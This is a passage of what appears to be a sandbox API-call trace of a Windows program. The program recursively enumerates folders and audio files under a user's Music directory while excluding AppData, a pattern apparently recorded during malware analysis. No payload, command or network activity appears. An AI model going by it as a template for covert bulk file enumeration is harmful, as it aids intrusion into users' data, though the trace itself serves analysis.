[0029.126] FindNextFileW (in: hFindFile=0x7c2140, lpFindFileData=0x6ae270 | out: lpFindFileData=0x6ae270*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85ecded0, ftCreationTime.dwHighDateTime=0x1d5b6a5, ftLastAccessTime.dwLowDateTime=0xe0ac2d80, ftLastAccessTime.dwHighDateTime=0x1d5b812, ftLastWriteTime.dwLowDateTime=0xe0ac2d80, ftLastWriteTime.dwHighDateTime=0x1d5b812, nFileSizeHigh=0x0, nFileSizeLow=0x275a, dwReserved0=0x10, dwReserved1=0x777648, cFileName="6VvYzvePP1.m4a", cAlternateFileName="6VVYZV~1.M4A")) returned 1 [0029.126] FindNextFileW (in: hFindFile=0x7c2140, lpFindFileData=0x6ae270 | out: lpFindFileData=0x6ae270*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf8175850, ftCreationTime.dwHighDateTime=0x1d5bfab, ftLastAccessTime.dwLowDateTime=0xfeb66fb0, ftLastAccessTime.dwHighDateTime=0x1d5ba1b, ftLastWriteTime.dwLowDateTime=0xfeb66fb0, ftLastWriteTime.dwHighDateTime=0x1d5ba1b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x10, dwReserved1=0x777648, cFileName="7d68KILlni", cAlternateFileName="7D68KI~1")) returned 1 [0029.126] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0029.126] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7d68KILlni", cchCount1=10, lpString2="AppData", cchCount2=7) returned 1 [0029.126] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0029.126] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\7d68KILlni\\*", lpFindFileData=0x6ae030 | out: lpFindFileData=0x6ae030*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf8175850, ftCreationTime.dwHighDateTime=0x1d5bfab, ftLastAccessTime.dwLowDateTime=0xfeb66fb0, ftLastAccessTime.dwHighDateTime=0x1d5ba1b, ftLastWriteTime.dwLowDateTime=0xfeb66fb0, ftLastWriteTime.dwHighDateTime=0x1d5ba1b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x777648, cFileName=".", cAlternateFileName="")) returned 0x7c2200 [0029.126] FindNextFileW (in: hFindFile=0x7c2200, lpFindFileData=0x6ae030 | out: lpFindFileData=0x6ae030*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf8175850, ftCreationTime.dwHighDateTime=0x1d5bfab, ftLastAccessTime.dwLowDateTime=0xfeb66fb0, ftLastAccessTime.dwHighDateTime=0x1d5ba1b, ftLastWriteTime.dwLowDateTime=0xfeb66fb0, ftLastWriteTime.dwHighDateTime=0x1d5ba1b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x777648, cFileName="..", cAlternateFileName="")) returned 1 [0029.126] FindNextFileW (in: hFindFile=0x7c2200, lpFindFileData=0x6ae030 | out: lpFindFileData=0x6ae030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x591ad440, ftCreationTime.dwHighDateTime=0x1d5b9b4, ftLastAccessTime.dwLowDateTime=0xe4915d20, ftLastAccessTime.dwHighDateTime=0x1d5c1b9, ftLastWriteTime.dwLowDateTime=0xe4915d20, ftLastWriteTime.dwHighDateTime=0x1d5c1b9, nFileSizeHigh=0x0, nFileSizeLow=0x53dc, dwReserved0=0x2020e02, dwReserved1=0x777648, cFileName="65ojNSJoZHlTi0VKh7.mp3", cAlternateFileName="65OJNS~1.MP3")) returned 1 [0029.126] FindNextFileW (in: hFindFile=0x7c2200, lpFindFileData=0x6ae018 | out: lpFindFileData=0x6ae018*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1e2e450, ftCreationTime.dwHighDateTime=0x1d5bebf, ftLastAccessTime.dwLowDateTime=0xb331b1b0, ftLastAccessTime.dwHighDateTime=0x1d5b923, ftLastWriteTime.dwLowDateTime=0xb331b1b0, ftLastWriteTime.dwHighDateTime=0x1d5b923, nFileSizeHigh=0x0, nFileSizeLow=0x1836a, dwReserved0=0x10, dwReserved1=0x777648, cFileName="Q_z7.mp3", cAlternateFileName="")) returned 1 [0029.127] FindNextFileW (in: hFindFile=0x7c2200, lpFindFileData=0x6ae018 | out: lpFindFileData=0x6ae018*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdbb7a8e0, ftCreationTime.dwHighDateTime=0x1d5b970, ftLastAccessTime.dwLowDateTime=0x3da53760, ftLastAccessTime.dwHighDateTime=0x1d5b9b3, ftLastWriteTime.dwLowDateTime=0x3da53760, ftLastWriteTime.dwHighDateTime=0x1d5b9b3, nFileSizeHigh=0x0, nFileSizeLow=0x152c0, dwReserved0=0x770000, dwReserved1=0x777648, cFileName="SHI6u88nCZyGa2ZYK.mp3", cAlternateFileName="SHI6U8~1.MP3")) returned 1 [0029.127] FindNextFileW (in: hFindFile=0x7c2200, lpFindFileData=0x6ae018 | out: lpFindFileData=0x6ae018*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7a885f0, ftCreationTime.dwHighDateTime=0x1d5bfd6, ftLastAccessTime.dwLowDateTime=0xf32dd8d0, ftLastAccessTime.dwHighDateTime=0x1d5c53e, ftLastWriteTime.dwLowDateTime=0xf32dd8d0, ftLastWriteTime.dwHighDateTime=0x1d5c53e, nFileSizeHigh=0x0, nFileSizeLow=0x2ddd, dwReserved0=0x10, dwReserved1=0x777648, cFileName="z7Rh4U-493ioKt.m4a", cAlternateFileName="Z7RH4U~1.M4A")) returned 1 [0029.127] FindNextFileW (in: hFindFile=0x7c2200, lpFindFileData=0x6ae018 | out: lpFindFileData=0x6ae018*(dwFileAttributes=0x1340057, ftCreationTime.dwLowDateTime=0x36c01d, ftCreationTime.dwHighDateTime=0x6cf858, ftLastAccessTime.dwLowDateTime=0x77391ecd, ftLastAccessTime.dwHighDateTime=0x74852d, ftLastWriteTime.dwLowDateTime=0xfffffffe, ftLastWriteTime.dwHighDateTime=0x13a0058, nFileSizeHigh=0x36c01d, nFileSizeLow=0x889fb8, dwReserved0=0x10, dwReserved1=0x777648, cFileName="z7\x08", cAlternateFileName="᳘{jဓĩ\x10")) returned 0 [0029.127] FindClose (in: hFindFile=0x7c2200 | out: hFindFile=0x7c2200) returned 1 [0029.127] FindNextFileW (in: hFindFile=0x7c2140, lpFindFileData=0x6ae270 | out: lpFindFileData=0x6ae270*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x77744c, dwReserved1=0x777648, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0029.127] FindNextFileW (in: hFindFile=0x7c2140, lpFindFileData=0x6ae270 | out: lpFindFileData=0x6ae270*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x59695b30, ftCreationTime.dwHighDateTime=0x1d5c240, ftLastAccessTime.dwLowDateTime=0x9c1fc00, ftLastAccessTime.dwHighDateTime=0x1d5b6c8, ftLastWriteTime.dwLowDateTime=0x9c1fc00, ftLastWriteTime.dwHighDateTime=0x1d5b6c8, nFileSizeHigh=0x0, nFileSizeLow=0xec0, dwReserved0=0x10, dwReserved1=0x777648, cFileName="f5eSIWN.mp3", cAlternateFileName="")) returned 1 [0029.127] FindNextFileW (in: hFindFile=0x7c2140, lpFindFileData=0x6ae270 | out: lpFindFileData=0x6ae270*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4c949e00, ftCreationTime.dwHighDateTime=0x1d5b7a6, ftLastAccessTime.dwLowDateTime=0x344d6830, ftLastAccessTime.dwHighDateTime=0x1d5b86a, ftLastWriteTime.dwLowDateTime=0x344d6830, ftLastWriteTime.dwHighDateTime=0x1d5b86a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x10, dwReserved1=0x777648, cFileName="KS4_7oSCes8f", cAlternateFileName="KS4_7O~1")) returned 1 [0029.127] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0029.127] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KS4_7oSCes8f", cchCount1=12, lpString2="AppData", cchCount2=7) returned 3 [0029.127] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0029.128] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\*", lpFindFileData=0x6ae030 | out: lpFindFileData=0x6ae030*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4c949e00, ftCreationTime.dwHighDateTime=0x1d5b7a6, ftLastAccessTime.dwLowDateTime=0x344d6830, ftLastAccessTime.dwHighDateTime=0x1d5b86a, ftLastWriteTime.dwLowDateTime=0x344d6830, ftLastWriteTime.dwHighDateTime=0x1d5b86a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x777648, cFileName=".", cAlternateFileName="")) returned 0x7c2200 [0029.128] FindNextFileW (in: hFindFile=0x7c2200, lpFindFileData=0x6ae030 | out: lpFindFileData=0x6ae030*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4c949e00, ftCreationTime.dwHighDateTime=0x1d5b7a6, ftLastAccessTime.dwLowDateTime=0x344d6830, ftLastAccessTime.dwHighDateTime=0x1d5b86a, ftLastWriteTime.dwLowDateTime=0x344d6830, ftLastWriteTime.dwHighDateTime=0x1d5b86a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x777648, cFileName="..", cAlternateFileName="")) returned 1 [0029.128] FindNextFileW (in: hFindFile=0x7c2200, lpFindFileData=0x6ae030 | out: lpFindFileData=0x6ae030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa51e1a00, ftCreationTime.dwHighDateTime=0x1d5b89c, ftLastAccessTime.dwLowDateTime=0x731a870, ftLastAccessTime.dwHighDateTime=0x1d5b91e, ftLastWriteTime.dwLowDateTime=0x731a870, ftLastWriteTime.dwHighDateTime=0x1d5b91e, nFileSizeHigh=0x0, nFileSizeLow=0x3d1d, dwReserved0=0x2020e02, dwReserved1=0x777648, cFileName="fxfiITiq48pQW.mp3", cAlternateFileName="FXFIIT~1.MP3")) returned 1 [0029.128] FindNextFileW (in: hFindFile=0x7c2200, lpFindFileData=0x6ae018 | out: lpFindFileData=0x6ae018*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x834f67b0, ftCreationTime.dwHighDateTime=0x1d5c055, ftLastAccessTime.dwLowDateTime=0x263901d0, ftLastAccessTime.dwHighDateTime=0x1d5c447, ftLastWriteTime.dwLowDateTime=0x263901d0, ftLastWriteTime.dwHighDateTime=0x1d5c447, nFileSizeHigh=0x0, nFileSizeLow=0xde21, dwReserved0=0x10, dwReserved1=0x777648, cFileName="gYCwk0YFX3naEmF50.mp3", cAlternateFileName="GYCWK0~1.MP3")) returned 1 [0029.128] FindNextFileW (in: hFindFile=0x7c2200, lpFindFileData=0x6ae018 | out: lpFindFileData=0x6ae018*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7e0224c0, ftCreationTime.dwHighDateTime=0x1d5c521, ftLastAccessTime.dwLowDateTime=0xddf610, ftLastAccessTime.dwHighDateTime=0x1d5b5a7, ftLastWriteTime.dwLowDateTime=0xddf610, ftLastWriteTime.dwHighDateTime=0x1d5b5a7, nFileSizeHigh=0x0, nFileSizeLow=0x56c1, dwReserved0=0x770000, dwReserved1=0x777648, cFileName="SvUMdBH5SwJrEWp.m4a", cAlternateFileName="SVUMDB~1.M4A")) returned 1 [0029.129] FindNextFileW (in: hFindFile=0x7c2200, lpFindFileData=0x6ae018 | out: lpFindFileData=0x6ae018*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ac52da0, ftCreationTime.dwHighDateTime=0x1d5c0fa, ftLastAccessTime.dwLowDateTime=0x2339e1c0, ftLastAccessTime.dwHighDateTime=0x1d5be98, ftLastWriteTime.dwLowDateTime=0x2339e1c0, ftLastWriteTime.dwHighDateTime=0x1d5be98, nFileSizeHigh=0x0, nFileSizeLow=0x16f92, dwReserved0=0x10, dwReserved1=0x777648, cFileName="__Hn.mp3", cAlternateFileName="")) returned 1 [0029.129] FindNextFileW (in: hFindFile=0x7c2200, lpFindFileData=0x6ae018 | out: lpFindFileData=0x6ae018*(dwFileAttributes=0x1340057, ftCreationTime.dwLowDateTime=0x36c0a7, ftCreationTime.dwHighDateTime=0x6cf858, ftLastAccessTime.dwLowDateTime=0x77391ecd, ftLastAccessTime.dwHighDateTime=0x74852d, ftLastWriteTime.dwLowDateTime=0x11, ftLastWriteTime.dwHighDateTime=0x1060058, nFileSizeHigh=0x36c0a7, nFileSizeLow=0x7c1110, dwReserved0=0x10, dwReserved1=0x777648, cFileName="__\x08", cAlternateFileName="ᲈ{jဓĩ\x10")) returned 0 [0029.129] FindClose (in: hFindFile=0x7c2200 | out: hFindFile=0x7c2200) returned 1 [0029.129] FindNextFileW (in: hFindFile=0x7c2140, lpFindFileData=0x6ae270 | out: lpFindFileData=0x6ae270*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58b23f10, ftCreationTime.dwHighDateTime=0x1d5c162, ftLastAccessTime.dwLowDateTime=0xc7bb7600, ftLastAccessTime.dwHighDateTime=0x1d5b93e, ftLastWriteTime.dwLowDateTime=0xc7bb7600, ftLastWriteTime.dwHighDateTime=0x1d5b93e, nFileSizeHigh=0x0, nFileSizeLow=0x1ccc, dwReserved0=0x77744c, dwReserved1=0x777648, cFileName="lWN8-ZQxM7632S6p.m4a", cAlternateFileName="LWN8-Z~1.M4A")) returned 1 [0029.129] FindNextFileW (in: hFindFile=0x7c2140, lpFindFileData=0x6ae270 | out: lpFindFileData=0x6ae270*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f3f4aa0, ftCreationTime.dwHighDateTime=0x1d5c100, ftLastAccessTime.dwLowDateTime=0x75c598c0, ftLastAccessTime.dwHighDateTime=0x1d5bc05, ftLastWriteTime.dwLowDateTime=0x75c598c0, ftLastWriteTime.dwHighDateTime=0x1d5bc05, nFileSizeHigh=0x0, nFileSizeLow=0x14996, dwReserved0=0x10, dwReserved1=0x777648, cFileName="ohsKY-A9exL.wav", cAlternateFileName="OHSKY-~1.WAV")) returned 1 [0029.129] FindNextFileW (in: hFindFile=0x7c2140, lpFindFileData=0x6ae270 | out: lpFindFileData=0x6ae270*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x858f4c0, ftCreationTime.dwHighDateTime=0x1d5c04d, ftLastAccessTime.dwLowDateTime=0xae3b6570, ftLastAccessTime.dwHighDateTime=0x1d5bfbd, ftLastWriteTime.dwLowDateTime=0xae3b6570, ftLastWriteTime.dwHighDateTime=0x1d5bfbd, nFileSizeHigh=0x0, nFileSizeLow=0x28f2, dwReserved0=0x10, dwReserved1=0x777648, cFileName="s65Zb6gGvH2opWaFb.m4a", cAlternateFileName="S65ZB6~1.M4A")) returned 1 [0029.129] FindNextFileW (in: hFindFile=0x7c2140, lpFindFileData=0x6ae270 | out: lpFindFileData=0x6ae270*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x939c98a0, ftCreationTime.dwHighDateTime=0x1d5c1c1, ftLastAccessTime.dwLowDateTime=0xb4f60e50, ftLastAccessTime.dwHighDateTime=0x1d5bae1, ftLastWriteTime.dwLowDateTime=0xb4f60e50, ftLastWriteTime.dwHighDateTime=0x1d5bae1, nFileSizeHigh=0x0, nFileSizeLow=0x10944, dwReserved0=0x10, dwReserved1=0x777648, cFileName="SG2JCe2OU9yef2QQFr-.wav", cAlternateFileName="SG2JCE~1.WAV")) returned 1 [0029.129] FindNextFileW (in: hFindFile=0x7c2140, lpFindFileData=0x6ae270 | out: lpFindFileData=0x6ae270*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x861d3e90, ftCreationTime.dwHighDateTime=0x1d5c122, ftLastAccessTime.dwLowDateTime=0xdfd494b0, ftLastAccessTime.dwHighDateTime=0x1d5c564, ftLastWriteTime.dwLowDateTime=0xdfd494b0, ftLastWriteTime.dwHighDateTime=0x1d5c564, nFileSizeHigh=0x0, nFileSizeLow=0x1719c, dwReserved0=0x10, dwReserved1=0x777648, cFileName="vW-6Csrf0kc.wav", cAlternateFileName="VW-6CS~1.WAV")) returned 1 [0029.129] FindNextFileW (in: hFindFile=0x7c2140, lpFindFileData=0x6ae270 | out: lpFindFileData=0x6ae270*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd5efa240, ftCreationTime.dwHighDateTime=0x1d5bf9d, ftLastAccessTime.dwLowDateTime=0x54f4ee0, ftLastAccessTime.dwHighDateTime=0x1d5be37, ftLastWriteTime.dwLowDateTime=0x54f4ee0, ftLastWriteTime.dwHighDateTime=0x1d5be37, nFileSizeHigh=0x0, nFileSizeLow=0x13874, dwReserved0=0x10, dwReserved1=0x777648, cFileName="XajMo5BmFRMN.mp3", cAlternateFileName="XAJMO5~1.MP3")) returned 1 [0029.129] FindNextFileW (in: hFindFile=0x7c2140, lpFindFileData=0x6ae270 | out: lpFindFileData=0x6ae270*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xce10740, ftCreationTime.dwHighDateTime=0x1d5c466, ftLastAccessTime.dwLowDateTime=0x208dcbe0, ftLastAccessTime.dwHighDateTime=0x1d5bb27, ftLastWriteTime.dwLowDateTime=0x208dcbe0, ftLastWriteTime.dwHighDateTime=0x1d5bb27, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x10, dwReserved1=0x777648, cFileName="y6uBt-QDHh8VkXOg3X", cAlternateFileName="Y6UBT-~1")) returned 1 [0029.129] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0029.129] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="y6uBt-QDHh8VkXOg3X", cchCount1=18, lpString2="AppData", cchCount2=7) returned 3 [0029.129] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0029.129] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\*", lpFindFileData=0x6ae030 | out: lpFindFileData=0x6ae030*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xce10740, ftCreationTime.dwHighDateTime=0x1d5c466, ftLastAccessTime.dwLowDateTime=0x208dcbe0, ftLastAccessTime.dwHighDateTime=0x1d5bb27, ftLastWriteTime.dwLowDateTime=0x208dcbe0, ftLastWriteTime.dwHighDateTime=0x1d5bb27, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x777648, cFileName=".", cAlternateFileName="")) returned 0x7c2200 [0029.130] FindNextFileW (in: hFindFile=0x7c2200, lpFindFileData=0x6ae030 | out: lpFindFileData=0x6ae030*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xce10740, ftCreationTime.dwHighDateTime=0x1d5c466, ftLastAccessTime.dwLowDateTime=0x208dcbe0, ftLastAccessTime.dwHighDateTime=0x1d5bb27, ftLastWriteTime.dwLowDateTime=0x208dcbe0, ftLastWriteTime.dwHighDateTime=0x1d5bb27, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x777648, cFileName="..", cAlternateFileName="")) returned 1 [0029.130] FindNextFileW (in: hFindFile=0x7c2200, lpFindFileData=0x6ae030 | out: lpFindFileData=0x6ae030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ebd1f00, ftCreationTime.dwHighDateTime=0x1d5bbf4, ftLastAccessTime.dwLowDateTime=0x9a6973d0, ftLastAccessTime.dwHighDateTime=0x1d5bdff, ftLastWriteTime.dwLowDateTime=0x9a6973d0, ftLastWriteTime.dwHighDateTime=0x1d5bdff, nFileSizeHigh=0x0, nFileSizeLow=0x8acf, dwReserved0=0x2020e02, dwReserved1=0x777648, cFileName="6YdESMaDUlc.wav", cAlternateFileName="6YDESM~1.WAV")) returned 1 [0029.130] FindNextFileW (in: hFindFile=0x7c2200, lpFindFileData=0x6ae018 | out: lpFindFileData=0x6ae018*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5605b140, ftCreationTime.dwHighDateTime=0x1d5bb02, ftLastAccessTime.dwLowDateTime=0x44983720, ftLastAccessTime.dwHighDateTime=0x1d5c084, ftLastWriteTime.dwLowDateTime=0x44983720, ftLastWriteTime.dwHighDateTime=0x1d5c084, nFileSizeHigh=0x0, nFileSizeLow=0x160cd, dwReserved0=0x770000, dwReserved1=0x777648, cFileName="E6Du.wav", cAlternateFileName="")) returned 1 [0029.130] FindNextFileW (in: hFindFile=0x7c2200, lpFindFileData=0x6ae018 | out: lpFindFileData=0x6ae018*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe7f81270, ftCreationTime.dwHighDateTime=0x1d5bdc1, ftLastAccessTime.dwLowDateTime=0x509ea0e0, ftLastAccessTime.dwHighDateTime=0x1d5bc01, ftLastWriteTime.dwLowDateTime=0x509ea0e0, ftLastWriteTime.dwHighDateTime=0x1d5bc01, nFileSizeHigh=0x0, nFileSizeLow=0xfa32, dwReserved0=0x770000, dwReserved1=0x777648, cFileName="ZaH-2jgJS1xf027TWp.wav", cAlternateFileName="ZAH-2J~1.WAV")) returned 1 [0029.130] FindNextFileW (in: hFindFile=0x7c2200, lpFindFileData=0x6ae018 | out: lpFindFileData=0x6ae018*(dwFileAttributes=0x1060057, ftCreationTime.dwLowDateTime=0x36c158, ftCreationTime.dwHighDateTime=0x6cf858, ftLastAccessTime.dwLowDateTime=0x77391ecd, ftLastAccessTime.dwHighDateTime=0x74852d, ftLastWriteTime.dwLowDateTime=0x15, ftLastWriteTime.dwHighDateTime=0x1460058, nFileSizeHigh=0x36c158, nFileSizeLow=0x7c1110, dwReserved0=0x10, dwReserved1=0x777648, cFileName="Za\x08", cAlternateFileName="Ჰ{jဓĩ\x10")) returned 0 [0029.130] FindClose (in: hFindFile=0x7c2200 | out: hFindFile=0x7c2200) returned 1 [0029.130] FindNextFileW (in: hFindFile=0x7c2140, lpFindFileData=0x6ae270 | out: lpFindFileData=0x6ae270*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcc1acd70, ftCreationTime.dwHighDateTime=0x1d5c43f, ftLastAccessTime.dwLowDateTime=0x615be270, ftLastAccessTime.dwHighDateTime=0x1d5bd51, ftLastWriteTime.dwLowDateTime=0x615be270, ftLastWriteTime.dwHighDateTime=0x1d5bd51, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77744c, dwReserved1=0x777648, cFileName="zpoE-x9XwzeBvpPNc", cAlternateFileName="ZPOE-X~1")) returned 1 [0029.130] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0029.130] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zpoE-x9XwzeBvpPNc", cchCount1=17, lpString2="AppData", cchCount2=7) returned 3 [0029.130] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0029.130] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\*", lpFindFileData=0x6ae030 | out: lpFindFileData=0x6ae030*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcc1acd70, ftCreationTime.dwHighDateTime=0x1d5c43f, ftLastAccessTime.dwLowDateTime=0x615be270, ftLastAccessTime.dwHighDateTime=0x1d5bd51, ftLastWriteTime.dwLowDateTime=0x615be270, ftLastWriteTime.dwHighDateTime=0x1d5bd51, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x777648, cFileName=".", cAlternateFileName="")) returned 0x7c2200 [0029.130] FindNextFileW (in: hFindFile=0x7c2200, lpFindFileData=0x6ae030 | out: lpFindFileData=0x6ae030*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcc1acd70, ftCreationTime.dwHighDateTime=0x1d5c43f, ftLastAccessTime.dwLowDateTime=0x615be270, ftLastAccessTime.dwHighDateTime=0x1d5bd51, ftLastWriteTime.dwLowDateTime=0x615be270, ftLastWriteTime.dwHighDateTime=0x1d5bd51, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x777648, cFileName="..", cAlternateFileName="")) returned 1 [0029.130] FindNextFileW (in: hFindFile=0x7c2200, lpFindFileData=0x6ae030 | out: lpFindFileData=0x6ae030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4623dd80, ftCreationTime.dwHighDateTime=0x1d5ba60, ftLastAccessTime.dwLowDateTime=0xb95244e0, ftLastAccessTime.dwHighDateTime=0x1d5b5f1, ftLastWriteTime.dwLowDateTime=0xb95244e0, ftLastWriteTime.dwHighDateTime=0x1d5b5f1, nFileSizeHigh=0x0, nFileSizeLow=0xec62, dwReserved0=0x2020e02, dwReserved1=0x777648, cFileName="BT6E6z.m4a", cAlternateFileName="")) returned 1 [0029.130] FindNextFileW (in: hFindFile=0x7c2200, lpFindFileData=0x6ae018 | out: lpFindFileData=0x6ae018*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcff3990, ftCreationTime.dwHighDateTime=0x1d5b921, ftLastAccessTime.dwLowDateTime=0x3058f6a0, ftLastAccessTime.dwHighDateTime=0x1d5c0e8, ftLastWriteTime.dwLowDateTime=0x3058f6a0, ftLastWriteTime.dwHighDateTime=0x1d5c0e8, nFileSizeHigh=0x0, nFileSizeLow=0x3c1a, dwReserved0=0x10, dwReserved1=0x777648, cFileName="GR_-.m4a", cAlternateFileName="")) returned 1 [0029.131] FindNextFileW (in: hFindFile=0x7c2200, lpFindFileData=0x6ae018 | out: lpFindFileData=0x6ae018*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ca4bcf0, ftCreationTime.dwHighDateTime=0x1d5bb71, ftLastAccessTime.dwLowDateTime=0x253ef3a0, ftLastAccessTime.dwHighDateTime=0x1d5c0d4, ftLastWriteTime.dwLowDateTime=0x253ef3a0, ftLastWriteTime.dwHighDateTime=0x1d5c0d4, nFileSizeHigh=0x0, nFileSizeLow=0xd484, dwReserved0=0x770000, dwReserved1=0x777648, cFileName="tHua2JefIhtOfCp.m4a", cAlternateFileName="THUA2J~1.M4A")) returned 1 [0029.131] FindNextFileW (in: hFindFile=0x7c2200, lpFindFileData=0x6ae018 | out: lpFindFileData=0x6ae018*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa57f2460, ftCreationTime.dwHighDateTime=0x1d5bd3f, ftLastAccessTime.dwLowDateTime=0x5a013ad0, ftLastAccessTime.dwHighDateTime=0x1d5b77e, ftLastWriteTime.dwLowDateTime=0x5a013ad0, ftLastWriteTime.dwHighDateTime=0x1d5b77e, nFileSizeHigh=0x0, nFileSizeLow=0x112e1, dwReserved0=0x10, dwReserved1=0x777648, cFileName="wiOEx9T.wav", cAlternateFileName="")) returned 1 [0029.131] FindNextFileW (in: hFindFile=0x7c2200, lpFindFileData=0x6ae018 | out: lpFindFileData=0x6ae018*(dwFileAttributes=0x1060057, ftCreationTime.dwLowDateTime=0x36c1c8, ftCreationTime.dwHighDateTime=0x6cf858, ftLastAccessTime.dwLowDateTime=0x77391ecd, ftLastAccessTime.dwHighDateTime=0x74852d, ftLastWriteTime.dwLowDateTime=0xfffffffe, ftLastWriteTime.dwHighDateTime=0x10e0058, nFileSizeHigh=0x36c1c8, nFileSizeLow=0x889f28, dwReserved0=0x10, dwReserved1=0x777648, cFileName="wi\x08", cAlternateFileName="᰸{jဓĩ\x10")) returned 0 [0029.131] FindClose (in: hFindFile=0x7c2200 | out: hFindFile=0x7c2200) returned 1 [0029.131] FindNextFileW (in: hFindFile=0x7c2140, lpFindFileData=0x6ae270 | out: lpFindFileData=0x6ae270*(dwFileAttributes=0x1300068, ftCreationTime.dwLowDateTime=0x36c1e0, ftCreationTime.dwHighDateTime=0x777648, ftLastAccessTime.dwLowDateTime=0x36c1cb, ftLastAccessTime.dwHighDateTime=0x8, ftLastWriteTime.dwLowDateTime=0x1336310, ftLastWriteTime.dwHighDateTime=0x12c0069, nFileSizeHigh=0x36c1e0, nFileSizeLow=0x777338, dwReserved0=0x77744c, dwReserved1=0x777648, cFileName="盈w\x08", cAlternateFileName="᪀{jဓĩ\x10")) returned 0 [0029.131] FindClose (in: hFindFile=0x7c2140 | out: hFindFile=0x7c2140) returned 1 [0029.131] FindNextFileW (in: hFindFile=0x7c2080, lpFindFileData=0x6ae4c8 | out: lpFindFileData=0x6ae4c8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, 